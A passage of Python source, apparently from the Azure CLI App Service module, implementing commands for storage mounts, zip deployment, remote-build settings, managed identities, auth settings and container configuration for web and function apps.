'list_azure_storage_accounts', slot)
if custom_id in azure_storage_accounts.properties:
raise CLIError("Site already configured with an Azure storage account with the id '{}'. "
"Use 'az webapp config storage-account update' to update an existing "
"Azure storage account configuration.".format(custom_id))
azure_storage_accounts.properties[custom_id] = AzureStorageInfoValue(type=storage_type, account_name=account_name,
share_name=share_name, access_key=access_key,
mount_path=mount_path)
client = web_client_factory(cmd.cli_ctx)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_azure_storage_accounts', azure_storage_accounts.properties,
slot, client)
if slot_setting:
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
slot_cfg_names.azure_storage_config_names = slot_cfg_names.azure_storage_config_names or []
if custom_id not in slot_cfg_names.azure_storage_config_names:
slot_cfg_names.azure_storage_config_names.append(custom_id)
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return result.properties
def update_azure_storage_account(cmd, resource_group_name, name, custom_id, storage_type=None, account_name=None,
share_name=None, access_key=None, mount_path=None, slot=None, slot_setting=False):
AzureStorageInfoValue = cmd.get_models('AzureStorageInfoValue')
azure_storage_accounts = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_azure_storage_accounts', slot)
existing_account_config = azure_storage_accounts.properties.pop(custom_id, None)
if not existing_account_config:
raise CLIError("No Azure storage account configuration found with the id '{}'. "
"Use 'az webapp config storage-account add' to add a new "
"Azure storage account configuration.".format(custom_id))
new_account_config = AzureStorageInfoValue(
type=storage_type or existing_account_config.type,
account_name=account_name or existing_account_config.account_name,
share_name=share_name or existing_account_config.share_name,
access_key=access_key or existing_account_config.access_key,
mount_path=mount_path or existing_account_config.mount_path
)
azure_storage_accounts.properties[custom_id] = new_account_config
client = web_client_factory(cmd.cli_ctx)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_azure_storage_accounts', azure_storage_accounts.properties,
slot, client)
if slot_setting:
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
slot_cfg_names.azure_storage_config_names = slot_cfg_names.azure_storage_config_names or []
if custom_id not in slot_cfg_names.azure_storage_config_names:
slot_cfg_names.azure_storage_config_names.append(custom_id)
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return result.properties
def enable_zip_deploy_functionapp(cmd, resource_group_name, name, src, build_remote=False, timeout=None, slot=None):
client = web_client_factory(cmd.cli_ctx)
app = client.web_apps.get(resource_group_name, name)
if app is None:
raise CLIError('The function app \'{}\' was not found in resource group \'{}\'. '
'Please make sure these values are correct.'.format(name, resource_group_name))
parse_plan_id = parse_resource_id(app.server_farm_id)
plan_info = None
retry_delay = 10 # seconds
# We need to retry fetching the plan because, when the plan is created as part of the function app,
# it can take a few attempts before the plan becomes available
for _ in range(5):
plan_info = client.app_service_plans.get(parse_plan_id['resource_group'],
parse_plan_id['name'])
if plan_info is not None:
break
time.sleep(retry_delay)
if build_remote and not app.reserved:
raise CLIError('Remote build is only available on Linux function apps')
is_consumption = is_plan_consumption(cmd, plan_info)
if (not build_remote) and is_consumption and app.reserved:
return upload_zip_to_storage(cmd, resource_group_name, name, src, slot)
if build_remote:
add_remote_build_app_settings(cmd, resource_group_name, name, slot)
else:
remove_remote_build_app_settings(cmd, resource_group_name, name, slot)
return enable_zip_deploy(cmd, resource_group_name, name, src, timeout, slot)
def enable_zip_deploy_webapp(cmd, resource_group_name, name, src, timeout=None, slot=None):
return enable_zip_deploy(cmd, resource_group_name, name, src, timeout=timeout, slot=slot)
def enable_zip_deploy(cmd, resource_group_name, name, src, timeout=None, slot=None):
logger.warning("Getting scm site credentials for zip deployment")
user_name, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
try:
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
except ValueError:
raise CLIError('Failed to fetch the SCM URL for the app')
zip_url = scm_url + '/api/zipdeploy?isAsync=true'
deployment_status_url = scm_url + '/api/deployments/latest'
import urllib3
authorization = urllib3.util.make_headers(basic_auth='{0}:{1}'.format(user_name, password))
headers = authorization
headers['Content-Type'] = 'application/octet-stream'
headers['Cache-Control'] = 'no-cache'
headers['User-Agent'] = get_az_user_agent()
import requests
import os
from azure.cli.core.util import should_disable_connection_verify
# Read file content
with open(os.path.realpath(os.path.expanduser(src)), 'rb') as fs:
zip_content = fs.read()
logger.warning("Starting zip deployment. This operation can take a while to complete ...")
res = requests.post(zip_url, data=zip_content, headers=headers, verify=not should_disable_connection_verify())
logger.warning("Deployment endpoint responded with status code %d", res.status_code)
# check if there's an ongoing process
if res.status_code == 409:
raise CLIError("There may be an ongoing deployment or your app setting has WEBSITE_RUN_FROM_PACKAGE. "
"Please track your deployment in {} and ensure the WEBSITE_RUN_FROM_PACKAGE app setting "
"is removed.".format(deployment_status_url))
# check the status of async deployment
response = _check_zip_deployment_status(cmd, resource_group_name, name, deployment_status_url,
authorization, timeout)
return response
def add_remote_build_app_settings(cmd, resource_group_name, name, slot):
settings = get_app_settings(cmd, resource_group_name, name, slot)
scm_do_build_during_deployment = None
website_run_from_package = None
enable_oryx_build = None
app_settings_should_not_have = []
app_settings_should_contain = {}
for keyval in settings:
value = keyval['value'].lower()
if keyval['name'] == 'SCM_DO_BUILD_DURING_DEPLOYMENT':
scm_do_build_during_deployment = value in ('true', '1')
if keyval['name'] == 'WEBSITE_RUN_FROM_PACKAGE':
website_run_from_package = value
if keyval['name'] == 'ENABLE_ORYX_BUILD':
enable_oryx_build = value
if scm_do_build_during_deployment is not True:
logger.warning("Setting SCM_DO_BUILD_DURING_DEPLOYMENT to true")
update_app_settings(cmd, resource_group_name, name, [
"SCM_DO_BUILD_DURING_DEPLOYMENT=true"
], slot)
app_settings_should_contain['SCM_DO_BUILD_DURING_DEPLOYMENT'] = 'true'
if website_run_from_package:
logger.warning("Removing WEBSITE_RUN_FROM_PACKAGE app setting")
delete_app_settings(cmd, resource_group_name, name, [
"WEBSITE_RUN_FROM_PACKAGE"
], slot)
app_settings_should_not_have.append('WEBSITE_RUN_FROM_PACKAGE')
if enable_oryx_build:
logger.warning("Removing ENABLE_ORYX_BUILD app setting")
delete_app_settings(cmd, resource_group_name, name, [
"ENABLE_ORYX_BUILD"
], slot)
app_settings_should_not_have.append('ENABLE_ORYX_BUILD')
# Wait for scm site to get the latest app settings
if app_settings_should_not_have or app_settings_should_contain:
logger.warning("Waiting SCM site to be updated with the latest app settings")
scm_is_up_to_date = False
retries = 10
while not scm_is_up_to_date and retries >= 0:
scm_is_up_to_date = validate_app_settings_in_scm(
cmd, resource_group_name, name, slot,
should_contain=app_settings_should_contain,
should_not_have=app_settings_should_not_have)
retries -= 1
time.sleep(5)
if retries < 0:
logger.warning("App settings may not be propagated to the SCM site.")
def remove_remote_build_app_settings(cmd, resource_group_name, name, slot):
settings = get_app_settings(cmd, resource_group_name, name, slot)
scm_do_build_during_deployment = None
app_settings_should_contain = {}
for keyval in settings:
value = keyval['value'].lower()
if keyval['name'] == 'SCM_DO_BUILD_DURING_DEPLOYMENT':
scm_do_build_during_deployment = value in ('true', '1')
if scm_do_build_during_deployment is not False:
logger.warning("Setting SCM_DO_BUILD_DURING_DEPLOYMENT to false")
update_app_settings(cmd, resource_group_name, name, [
"SCM_DO_BUILD_DURING_DEPLOYMENT=false"
], slot)
app_settings_should_contain['SCM_DO_BUILD_DURING_DEPLOYMENT'] = 'false'
# Wait for scm site to get the latest app settings
if app_settings_should_contain:
logger.warning("Waiting SCM site to be updated with the latest app settings")
scm_is_up_to_date = False
retries = 10
while not scm_is_up_to_date and retries >= 0:
scm_is_up_to_date = validate_app_settings_in_scm(
cmd, resource_group_name, name, slot,
should_contain=app_settings_should_contain)
retries -= 1
time.sleep(5)
if retries < 0:
logger.warning("App settings may not be propagated to the SCM site")
def upload_zip_to_storage(cmd, resource_group_name, name, src, slot=None):
settings = get_app_settings(cmd, resource_group_name, name, slot)
storage_connection = None
for keyval in settings:
if keyval['name'] == 'AzureWebJobsStorage':
storage_connection = str(keyval['value'])
if storage_connection is None:
raise CLIError('Could not find an \'AzureWebJobsStorage\' application setting')
container_name = "function-releases"
blob_name = "{}-{}.zip".format(datetime.datetime.today().strftime('%Y%m%d%H%M%S'), str(uuid.uuid4()))
BlockBlobService = get_sdk(cmd.cli_ctx, ResourceType.DATA_STORAGE, 'blob#BlockBlobService')
block_blob_service = BlockBlobService(connection_string=storage_connection)
if not block_blob_service.exists(container_name):
block_blob_service.create_container(container_name)
# https://gist.github.com/vladignatyev/06860ec2040cb497f0f3
def progress_callback(current, total):
total_length = 30
filled_length = int(round(total_length * current / float(total)))
percents = round(100.0 * current / float(total), 1)
progress_bar = '=' * filled_length + '-' * (total_length - filled_length)
progress_message = 'Uploading {} {}%'.format(progress_bar, percents)
cmd.cli_ctx.get_progress_controller().add(message=progress_message)
block_blob_service.create_blob_from_path(container_name, blob_name, src, validate_content=True,
progress_callback=progress_callback)
now = datetime.datetime.now()
blob_start = now - datetime.timedelta(minutes=10)
blob_end = now + datetime.timedelta(weeks=520)
BlobPermissions = get_sdk(cmd.cli_ctx, ResourceType.DATA_STORAGE, 'blob#BlobPermissions')
blob_token = block_blob_service.generate_blob_shared_access_signature(container_name,
blob_name,
permission=BlobPermissions(read=True),
expiry=blob_end,
start=blob_start)
blob_uri = block_blob_service.make_blob_url(container_name, blob_name, sas_token=blob_token)
website_run_from_setting = "WEBSITE_RUN_FROM_PACKAGE={}".format(blob_uri)
update_app_settings(cmd, resource_group_name, name, settings=[website_run_from_setting])
client = web_client_factory(cmd.cli_ctx)
try:
logger.info('\nSyncing Triggers...')
if slot is not None:
client.web_apps.sync_function_triggers_slot(resource_group_name, name, slot)
else:
client.web_apps.sync_function_triggers(resource_group_name, name)
except CloudError as ex:
# Due to a bad API spec, this SDK call can raise even when the status code is 200; ignore that case
if ex.status_code != 200:
raise ex
except DefaultErrorResponseException as ex:
if ex.response.status_code != 200:
raise ex
def _generic_settings_operation(cli_ctx, resource_group_name, name, operation_name,
setting_properties, slot=None, client=None):
client = client or web_client_factory(cli_ctx)
operation = getattr(client.web_apps, operation_name if slot is None else operation_name + '_slot')
if slot is None:
return operation(resource_group_name, name, str, setting_properties)
return operation(resource_group_name, name, slot, str, setting_properties)
def show_webapp(cmd, resource_group_name, name, slot=None, app_instance=None):
webapp = app_instance
if not app_instance: # when the routine is invoked as a help method, not through commands
webapp = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
if not webapp:
raise CLIError("'{}' app doesn't exist".format(name))
_rename_server_farm_props(webapp)
_fill_ftp_publishing_url(cmd, webapp, resource_group_name, name, slot)
return webapp
# for generic updater
def get_webapp(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
def set_webapp(cmd, resource_group_name, name, slot=None, skip_dns_registration=None,
skip_custom_domain_verification=None, force_dns_registration=None, ttl_in_seconds=None, **kwargs):
instance = kwargs['parameters']
client = web_client_factory(cmd.cli_ctx)
updater = client.web_apps.create_or_update_slot if slot else client.web_apps.create_or_update
kwargs = dict(resource_group_name=resource_group_name, name=name, site_envelope=instance,
skip_dns_registration=skip_dns_registration,
skip_custom_domain_verification=skip_custom_domain_verification,
force_dns_registration=force_dns_registration,
ttl_in_seconds=ttl_in_seconds)
if slot:
kwargs['slot'] = slot
return updater(**kwargs)
def update_webapp(instance, client_affinity_enabled=None, https_only=None):
if 'function' in instance.kind:
raise CLIError("please use 'az functionapp update' to update this function app")
if client_affinity_enabled is not None:
instance.client_affinity_enabled = client_affinity_enabled == 'true'
if https_only is not None:
instance.https_only = https_only == 'true'
return instance
def update_functionapp(cmd, instance, plan=None):
client = web_client_factory(cmd.cli_ctx)
if plan is not None:
if is_valid_resource_id(plan):
dest_parse_result = parse_resource_id(plan)
dest_plan_info = client.app_service_plans.get(dest_parse_result['resource_group'],
dest_parse_result['name'])
else:
dest_plan_info = client.app_service_plans.get(instance.resource_group, plan)
if dest_plan_info is None:
raise CLIError("The plan '{}' doesn't exist".format(plan))
validate_plan_switch_compatibility(cmd, client, instance, dest_plan_info)
instance.server_farm_id = dest_plan_info.id
return instance
def validate_plan_switch_compatibility(cmd, client, src_functionapp_instance, dest_plan_instance):
general_switch_msg = 'Currently, switching is only allowed between Consumption and Elastic Premium plans.'
src_parse_result = parse_resource_id(src_functionapp_instance.server_farm_id)
src_plan_info = client.app_service_plans.get(src_parse_result['resource_group'],
src_parse_result['name'])
if src_plan_info is None:
raise CLIError('Could not determine the current plan of the functionapp')
if not (is_plan_consumption(cmd, src_plan_info) or is_plan_elastic_premium(cmd, src_plan_info)):
raise CLIError('Your functionapp is not using a Consumption or an Elastic Premium plan. ' + general_switch_msg)
if not (is_plan_consumption(cmd, dest_plan_instance) or is_plan_elastic_premium(cmd, dest_plan_instance)):
raise CLIError('You are trying to move to a plan that is not a Consumption or an Elastic Premium plan. ' +
general_switch_msg)
def set_functionapp(cmd, resource_group_name, name, **kwargs):
instance = kwargs['parameters']
if 'function' not in instance.kind:
raise CLIError("'{}' is not a function app. Please use 'az webapp update' to update it.".format(name))
client = web_client_factory(cmd.cli_ctx)
return client.web_apps.create_or_update(resource_group_name, name, site_envelope=instance)
def list_webapp(cmd, resource_group_name=None):
result = _list_app(cmd.cli_ctx, resource_group_name)
return [r for r in result if 'function' not in r.kind]
def list_deleted_webapp(cmd, resource_group_name=None, name=None, slot=None):
result = _list_deleted_app(cmd.cli_ctx, resource_group_name, name, slot)
return sorted(result, key=lambda site: site.deleted_site_id)
def restore_deleted_webapp(cmd, deleted_id, resource_group_name, name, slot=None, restore_content_only=None):
DeletedAppRestoreRequest = cmd.get_models('DeletedAppRestoreRequest')
request = DeletedAppRestoreRequest(deleted_site_id=deleted_id, recover_configuration=not restore_content_only)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'restore_from_deleted_app', slot, request)
def list_function_app(cmd, resource_group_name=None):
result = _list_app(cmd.cli_ctx, resource_group_name)
return [r for r in result if 'function' in r.kind]
def _list_app(cli_ctx, resource_group_name=None):
client = web_client_factory(cli_ctx)
if resource_group_name:
result = list(client.web_apps.list_by_resource_group(resource_group_name))
else:
result = list(client.web_apps.list())
for webapp in result:
_rename_server_farm_props(webapp)
return result
def _list_deleted_app(cli_ctx, resource_group_name=None, name=None, slot=None):
client = web_client_factory(cli_ctx)
locations = _get_deleted_apps_locations(cli_ctx)
result = list()
for location in locations:
result = result + list(client.deleted_web_apps.list_by_location(location))
if resource_group_name:
result = [r for r in result if r.resource_group == resource_group_name]
if name:
result = [r for r in result if r.deleted_site_name.lower() == name.lower()]
if slot:
result = [r for r in result if r.slot.lower() == slot.lower()]
return result
def _build_identities_info(identities):
from ._appservice_utils import MSI_LOCAL_ID
identities = identities or []
identity_types = []
if not identities or MSI_LOCAL_ID in identities:
identity_types.append('SystemAssigned')
external_identities = [x for x in identities if x != MSI_LOCAL_ID]
if external_identities:
identity_types.append('UserAssigned')
identity_types = ','.join(identity_types)
info = {'type': identity_types}
if external_identities:
info['userAssignedIdentities'] = {e: {} for e in external_identities}
return (info, identity_types, external_identities, 'SystemAssigned' in identity_types)
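# Illustrative return values of _build_identities_info (hypothetical identity ids; a sketch, not executed here):
#   _build_identities_info(None)
#       -> ({'type': 'SystemAssigned'}, 'SystemAssigned', [], True)
#   _build_identities_info(['<user-assigned-identity-resource-id>'])
#       -> ({'type': 'UserAssigned',
#            'userAssignedIdentities': {'<user-assigned-identity-resource-id>': {}}},
#           'UserAssigned', ['<user-assigned-identity-resource-id>'], False)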
def assign_identity(cmd, resource_group_name, name, assign_identities=None, role='Contributor', slot=None, scope=None):
ManagedServiceIdentity, ResourceIdentityType = cmd.get_models('ManagedServiceIdentity',
'ManagedServiceIdentityType')
UserAssignedIdentitiesValue = cmd.get_models('ManagedServiceIdentityUserAssignedIdentitiesValue')
_, _, external_identities, enable_local_identity = _build_identities_info(assign_identities)
def getter():
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
def setter(webapp):
if webapp.identity and webapp.identity.type == ResourceIdentityType.system_assigned_user_assigned:
identity_types = ResourceIdentityType.system_assigned_user_assigned
elif webapp.identity and webapp.identity.type == ResourceIdentityType.system_assigned and external_identities:
identity_types = ResourceIdentityType.system_assigned_user_assigned
elif webapp.identity and webapp.identity.type == ResourceIdentityType.user_assigned and enable_local_identity:
identity_types = ResourceIdentityType.system_assigned_user_assigned
elif external_identities and enable_local_identity:
identity_types = ResourceIdentityType.system_assigned_user_assigned
elif external_identities:
identity_types = ResourceIdentityType.user_assigned
else:
identity_types = ResourceIdentityType.system_assigned
if webapp.identity:
webapp.identity.type = identity_types
else:
webapp.identity = ManagedServiceIdentity(type=identity_types)
if external_identities:
if not webapp.identity.user_assigned_identities:
webapp.identity.user_assigned_identities = {}
for identity in external_identities:
webapp.identity.user_assigned_identities[identity] = UserAssignedIdentitiesValue()
poller = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'create_or_update', slot, webapp)
return LongRunningOperation(cmd.cli_ctx)(poller)
from azure.cli.core.commands.arm import assign_identity as _assign_identity
webapp = _assign_identity(cmd.cli_ctx, getter, setter, role, scope)
return webapp.identity
def show_identity(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot).identity
def remove_identity(cmd, resource_group_name, name, remove_identities=None, slot=None):
IdentityType = cmd.get_models('ManagedServiceIdentityType')
UserAssignedIdentitiesValue = cmd.get_models('ManagedServiceIdentityUserAssignedIdentitiesValue')
_, _, external_identities, remove_local_identity = _build_identities_info(remove_identities)
def getter():
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
def setter(webapp):
if webapp.identity is None:
return webapp
to_remove = []
existing_identities = {x.lower() for x in list((webapp.identity.user_assigned_identities or {}).keys())}
if external_identities:
to_remove = {x.lower() for x in external_identities}
non_existing = to_remove.difference(existing_identities)
if non_existing:
raise CLIError("'{}' are not associated with '{}'".format(','.join(non_existing), name))
if not list(existing_identities - to_remove):
if webapp.identity.type == IdentityType.user_assigned:
webapp.identity.type = IdentityType.none
elif webapp.identity.type == IdentityType.system_assigned_user_assigned:
webapp.identity.type = IdentityType.system_assigned
webapp.identity.user_assigned_identities = None
if remove_local_identity:
webapp.identity.type = (IdentityType.none
if webapp.identity.type == IdentityType.system_assigned or
webapp.identity.type == IdentityType.none
else IdentityType.user_assigned)
if webapp.identity.type not in [IdentityType.none, IdentityType.system_assigned]:
webapp.identity.user_assigned_identities = {}
if to_remove:
for identity in list(existing_identities - to_remove):
webapp.identity.user_assigned_identities[identity] = UserAssignedIdentitiesValue()
else:
for identity in list(existing_identities):
webapp.identity.user_assigned_identities[identity] = UserAssignedIdentitiesValue()
poller = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'create_or_update', slot, webapp)
return LongRunningOperation(cmd.cli_ctx)(poller)
from azure.cli.core.commands.arm import assign_identity as _assign_identity
webapp = _assign_identity(cmd.cli_ctx, getter, setter)
return webapp.identity
def get_auth_settings(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_auth_settings', slot)
def is_auth_runtime_version_valid(runtime_version=None):
if runtime_version is None:
return True
if runtime_version.startswith("~") and len(runtime_version) > 1:
try:
int(runtime_version[1:])
except ValueError:
return False
return True
split_versions = runtime_version.split('.')
if len(split_versions) != 3:
return False
for version in split_versions:
try:
int(version)
except ValueError:
return False
return True
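# Illustrative accepted/rejected values for is_auth_runtime_version_valid (a sketch, not executed by this module):
#   is_auth_runtime_version_valid(None)      -> True   (nothing to validate)
#   is_auth_runtime_version_valid('~2')      -> True   (tilde followed by an integer)
#   is_auth_runtime_version_valid('1.22.1')  -> True   (exactly three integer components)
#   is_auth_runtime_version_valid('1.22')    -> False  (only two components)
#   is_auth_runtime_version_valid('~beta')   -> False  (non-integer after the tilde)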
def update_auth_settings(cmd, resource_group_name, name, enabled=None, action=None, # pylint: disable=unused-argument
client_id=None, token_store_enabled=None, runtime_version=None, # pylint: disable=unused-argument
token_refresh_extension_hours=None, # pylint: disable=unused-argument
allowed_external_redirect_urls=None, client_secret=None, # pylint: disable=unused-argument
client_secret_certificate_thumbprint=None, # pylint: disable=unused-argument
allowed_audiences=None, issuer=None, facebook_app_id=None, # pylint: disable=unused-argument
facebook_app_secret=None, facebook_oauth_scopes=None, # pylint: disable=unused-argument
twitter_consumer_key=None, twitter_consumer_secret=None, # pylint: disable=unused-argument
google_client_id=None, google_client_secret=None, # pylint: disable=unused-argument
google_oauth_scopes=None, microsoft_account_client_id=None, # pylint: disable=unused-argument
microsoft_account_client_secret=None, # pylint: disable=unused-argument
microsoft_account_oauth_scopes=None, slot=None): # pylint: disable=unused-argument
auth_settings = get_auth_settings(cmd, resource_group_name, name, slot)
UnauthenticatedClientAction = cmd.get_models('UnauthenticatedClientAction')
if action == 'AllowAnonymous':
auth_settings.unauthenticated_client_action = UnauthenticatedClientAction.allow_anonymous
elif action:
auth_settings.unauthenticated_client_action = UnauthenticatedClientAction.redirect_to_login_page
auth_settings.default_provider = AUTH_TYPES[action]
# validate runtime version
if not is_auth_runtime_version_valid(runtime_version):
raise CLIError('Usage Error: --runtime-version set to invalid value')
import inspect
frame = inspect.currentframe()
bool_flags = ['enabled', 'token_store_enabled']
# note: getargvalues is already used in azure.cli.core.commands,
# and there is no simple functional replacement for this deprecated method on Python 3.5
args, _, _, values = inspect.getargvalues(frame) # pylint: disable=deprecated-method
for arg in args[2:]:
if values.get(arg, None):
setattr(auth_settings, arg, values[arg] if arg not in bool_flags else values[arg] == 'true')
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_auth_settings', slot, auth_settings)
def list_instances(cmd, resource_group_name, name, slot=None):
# API version 2019-08-01 (the latest at the time of writing) does not return slot instances; however, 2018-02-01 does
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_instance_identifiers', slot,
api_version="2018-02-01")
# Currently using hardcoded values instead of this function. This function calls the stacks API;
# the Stacks API is updated with Antares deployments,
# which are infrequent and don't line up with the stacks' EOL schedule.
def list_runtimes(cmd, linux=False):
client = web_client_factory(cmd.cli_ctx)
runtime_helper = _StackRuntimeHelper(cmd=cmd, client=client, linux=linux)
return [s['displayName'] for s in runtime_helper.stacks]
def list_runtimes_hardcoded(linux=False):
if linux:
return [s['displayName'] for s in get_file_json(RUNTIME_STACKS)['linux']]
return [s['displayName'] for s in get_file_json(RUNTIME_STACKS)['windows']]
def _rename_server_farm_props(webapp):
# Should be renamed in SDK in a future release
setattr(webapp, 'app_service_plan_id', webapp.server_farm_id)
del webapp.server_farm_id
return webapp
def delete_function_app(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'delete', slot)
def delete_webapp(cmd, resource_group_name, name, keep_metrics=None, keep_empty_plan=None,
keep_dns_registration=None, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
client.web_apps.delete_slot(resource_group_name, name, slot,
delete_metrics=False if keep_metrics else None,
delete_empty_server_farm=False if keep_empty_plan else None,
skip_dns_registration=False if keep_dns_registration else None)
else:
client.web_apps.delete(resource_group_name, name,
delete_metrics=False if keep_metrics else None,
delete_empty_server_farm=False if keep_empty_plan else None,
skip_dns_registration=False if keep_dns_registration else None)
def stop_webapp(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'stop', slot)
def start_webapp(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'start', slot)
def restart_webapp(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'restart', slot)
def get_site_configs(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_configuration', slot)
def get_app_settings(cmd, resource_group_name, name, slot=None):
result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_application_settings', slot)
client = web_client_factory(cmd.cli_ctx)
slot_app_setting_names = client.web_apps.list_slot_configuration_names(resource_group_name, name).app_setting_names
return _build_app_settings_output(result.properties, slot_app_setting_names)
# Check whether the app settings have propagated to the Kudu (SCM) site by calling its api/settings endpoint
# should_have [] is a list of app setting names which are expected to be present
# should_not_have [] is a list of app setting names which are expected to be absent
# should_contain {} is a dictionary of app settings which are expected to be present with these exact values
# Returns True if validation succeeded
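# Illustrative call to validate_app_settings_in_scm (hypothetical resource names; a sketch, not executed here):
#   validate_app_settings_in_scm(cmd, 'my-rg', 'my-app',
#                                should_contain={'SCM_DO_BUILD_DURING_DEPLOYMENT': 'true'},
#                                should_not_have=['WEBSITE_RUN_FROM_PACKAGE'])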
def validate_app_settings_in_scm(cmd, resource_group_name, name, slot=None,
should_have=None, should_not_have=None, should_contain=None):
scm_settings = _get_app_settings_from_scm(cmd, resource_group_name, name, slot)
scm_setting_keys = set(scm_settings.keys())
if should_have and not set(should_have).issubset(scm_setting_keys):
return False
if should_not_have and set(should_not_have).intersection(scm_setting_keys):
return False
temp_setting = scm_settings.copy()
temp_setting.update(should_contain or {})
if temp_setting != scm_settings:
return False
return True
@retryable_method(3, 5)
def _get_app_settings_from_scm(cmd, resource_group_name, name, slot=None):
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
settings_url = '{}/api/settings'.format(scm_url)
username, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
headers = {
'Content-Type': 'application/octet-stream',
'Cache-Control': 'no-cache',
'User-Agent': get_az_user_agent()
}
import requests
response = requests.get(settings_url, headers=headers, auth=(username, password), timeout=3)
return response.json() or {}
def get_connection_strings(cmd, resource_group_name, name, slot=None):
result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_connection_strings', slot)
client = web_client_factory(cmd.cli_ctx)
slot_constr_names = client.web_apps.list_slot_configuration_names(resource_group_name, name) \
.connection_string_names or []
result = [{'name': p,
'value': result.properties[p].value,
'type':result.properties[p].type,
'slotSetting': p in slot_constr_names} for p in result.properties]
return result
def get_azure_storage_accounts(cmd, resource_group_name, name, slot=None):
client = web_client_factory(cmd.cli_ctx)
result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_azure_storage_accounts', slot)
slot_azure_storage_config_names = client.web_apps.list_slot_configuration_names(resource_group_name, name) \
.azure_storage_config_names or []
return [{'name': p,
'value': result.properties[p],
'slotSetting': p in slot_azure_storage_config_names} for p in result.properties]
def _fill_ftp_publishing_url(cmd, webapp, resource_group_name, name, slot=None):
profiles = list_publish_profiles(cmd, resource_group_name, name, slot)
url = next(p['publishUrl'] for p in profiles if p['publishMethod'] == 'FTP')
setattr(webapp, 'ftpPublishingUrl', url)
return webapp
def _format_fx_version(custom_image_name, container_config_type=None):
lower_custom_image_name = custom_image_name.lower()
if "https://" in lower_custom_image_name or "http://" in lower_custom_image_name:
custom_image_name = lower_custom_image_name.replace("https://", "").replace("http://", "")
fx_version = custom_image_name.strip()
fx_version_lower = fx_version.lower()
# handles case of only spaces
if fx_version:
if container_config_type:
fx_version = '{}|{}'.format(container_config_type, custom_image_name)
elif not fx_version_lower.startswith('docker|'):
fx_version = '{}|{}'.format('DOCKER', custom_image_name)
else:
fx_version = ' '
return fx_version
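# Illustrative outputs of _format_fx_version (hypothetical image names; a sketch, not executed by this module):
#   _format_fx_version('nginx:latest')                       -> 'DOCKER|nginx:latest'
#   _format_fx_version('docker|nginx:latest')                -> 'docker|nginx:latest'   (prefix already present)
#   _format_fx_version('<base64-compose-config>', 'COMPOSE') -> 'COMPOSE|<base64-compose-config>'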
def _add_fx_version(cmd, resource_group_name, name, custom_image_name, slot=None):
fx_version = _format_fx_version(custom_image_name)
web_app = get_webapp(cmd, resource_group_name, name, slot)
if not web_app:
raise CLIError("'{}' app doesn't exist in resource group {}".format(name, resource_group_name))
linux_fx = fx_version if web_app.reserved else None
windows_fx = fx_version if web_app.is_xenon else None
return update_site_configs(cmd, resource_group_name, name,
linux_fx_version=linux_fx, windows_fx_version=windows_fx, slot=slot)
def _delete_linux_fx_version(cmd, resource_group_name, name, slot=None):
return update_site_configs(cmd, resource_group_name, name, linux_fx_version=' ', slot=slot)
def _get_fx_version(cmd, resource_group_name, name, slot=None):
site_config = get_site_configs(cmd, resource_group_name, name, slot)
return site_config.linux_fx_version or site_config.windows_fx_version or ''
def url_validator(url):
try:
result = urlparse(url)
return all([result.scheme, result.netloc, result.path])
except ValueError:
return False
def _get_linux_multicontainer_decoded_config(cmd, resource_group_name, name, slot=None):
from base64 import b64decode
linux_fx_version = _get_fx_version(cmd, resource_group_name, name, slot)
if not any([linux_fx_version.startswith(s) for s in MULTI_CONTAINER_TYPES]):
raise CLIError("Cannot decode config that is not one of the"
" following types: {}".format(','.join(MULTI_CONTAINER_TYPES)))
return b64decode(linux_fx_version.split('|')[1].encode('utf-8'))
def _get_linux_multicontainer_encoded_config_from_file(file_name):
from base64 import b64encode
config_file_bytes = None
if url_validator(file_name):
response = urlopen(file_name, context=_ssl_context())
config_file_bytes = response.read()
else:
with open(file_name, 'rb') as f:
config_file_bytes = f.read()
# Decode base64 encoded byte array into string
return b64encode(config_file_bytes).decode('utf-8')
# for any modifications to the non-optional parameters, adjust the reflection logic
# in the method accordingly
# pylint: disable=unused-argument
def update_site_configs(cmd, resource_group_name, name, slot=None, number_of_workers=None, linux_fx_version=None,
windows_fx_version=None, pre_warmed_instance_count=None, php_version=None,
python_version=None, net_framework_version=None,
java_version=None, java_container=None, java_container_version=None,
remote_debugging_enabled=None, web_sockets_enabled=None,
always_on=None, auto_heal_enabled=None,
use32_bit_worker_process=None,
min_tls_version=None,
http20_enabled=None,
app_command_line=None,
ftps_state=None,
generic_configurations=None):
